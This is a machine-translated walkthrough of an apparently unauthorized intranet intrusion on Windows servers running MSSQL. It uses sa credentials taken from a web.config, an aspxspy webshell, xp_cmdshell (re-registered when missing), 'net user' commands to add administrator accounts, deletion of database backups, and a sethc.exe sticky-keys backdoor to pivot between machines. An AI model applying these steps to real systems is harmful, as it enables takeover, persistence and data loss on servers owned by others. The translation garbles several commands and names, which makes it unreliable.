MSSQL Intranet penetration

MSSQL Intranet penetration

Environment: 2003 SERVER

IIS: 6.0 supports php

Databases: MSSQL and MYSQL

Website type: ASPX

This article focuses on the Intranet penetration elevation, which is not described for WEBSHELL.

Anyone who knows about intrusion penetration knows that after obtaining the webshell, the server must first find the vulnerability where the Elevation of Privilege is located.

From the perspective of this site, MSSQL, MYSQL support for ASPX and PHP can be said that the permissions are large enough

First, let's take a look at what the directory can reveal.

Check the program directory first. Is there any information such as SU and MYSQL?

E: the disk can be viewed.

F: the disk can be viewed.

The ASPX type website on this site uses the MSSQL database. The user who shows that the password is not the highest permission, that is, a DB user cannot obtain the permission immediately.

Go over other sites and find the directories one by one.

A directory named web. config has a SA user.

Database connection information:

Source = gzzx; Initial Catalog = SMSCenter; Persist Security Info = True; User ID = sa; Password = ****

Enable aspxspy and use the database connection function.

The logon is successful, and the SA seems to have no permission downgrade.

The connection status is MSSQL 2005. Start xp_cmdshell first.

Run the "whoami" command"

Good, system permission. The following shows how to add an account.

Exec master. dbo. xp_mongoshell 'net user admin *****/add'

Exec master. dbo. xp_mongoshell 'net localgroup administrators admin/add'

Check if port 3389 is enabled.

Exec master. dbo. xp_mongoshell 'netstat-ano'

OK. The status is normal.

Exec master. dbo. xp_mongoshell 'ipconfig/all': the configuration is an intranet IP address.

The IP address resolved by the domain name can be connected to 3389.

It indicates that the management has implemented port ing, so do not forward the port. Saving a lot of effort!

In this way, the permissions of a server are obtained. From the SQL connection of the website, it is not difficult to find that there are SQL servers in the intranet.

Penetration continues ......

The Intranet IP address is 200, which is also the mssql sa permission.

Use the aspxspy database to connect,

Depressing things happen and cannot be connected.

[DBNETLIB] [ConnectionOpen (Connect ().] SQL Server does not exist or access is denied.

In principle, when the database can be used, it should be able to successfully connect to the database. Isn't the TCP/IP configured to access the database? The question arises. If you are impatient, try it on the server through 3389. MSSQL is installed on the server, including the query analyzer and Enterprise Manager. This has become our tool. Haha!

The SQL analyzer cannot be connected.

First, test the existence of the MSSQL Server machine.

A successful response indicates that the server exists.

Run mstsc and try to connect to MySQL 3389. an xp interface is displayed. Relatively depressing.

Try the name resolution service.

Click Browse to see which of the following MSSQL Server names is actually unknown. We can see that the 200 and IP200 machines are similar. Enter the SA and password.

Return to the query window. Try xp_cmdshell

No found, recovered

Use master dbcc addextendedproc ('xp _ javasshell', 'xp log70. dll ')

OK!

Run the "whoami" command, although XP does not support the whoami command.

Exec xp_cmdshell 'net user 123 123/add'

A system error is prompted. Not without permission to add .. Not really.

Idea: You can use sethc.exe to replace 3389.

 

Exec xp_cmdshell 'Copy c: \ windwos \ assumer.exe c: \ windows \ system32 \ sethc.exe 'replace it?

The problem arises again, prompting that the disk file is insufficient.

Use xp_dirtree to view the C drive

Exec master .. XP_dirtree 'C: \ ', 1, 1

List file directories and delete backups of a Database

Execute exec xp_cmdshell 'Copy c: \ windwos \ cmder.exe c: \ windows \ system32 \ sethc.exe'

Indicates that a file has been copied. 3389 shift does not pop up five times.

Try again

Exec xp_cmdshell 'net user 123 123/add' indicates that the operation is successful. It was originally a system error caused by insufficient space. Really like opening it!

Exec xp_cmdshell 'net localgroup administrator 123/add'

3389 log on.

Exec xp_cmdshell 'net user 123/del' delete a user

There are still many machines in the Intranet, and this penetration ends.

Conclusion: Intranet penetration technology is not difficult to understand. Careful research can find that every detail and step can inspire inspiration. Intranet forwarding from port to external connection, and then logging on from 3389 to internal 3389 is similar to stepping stone technology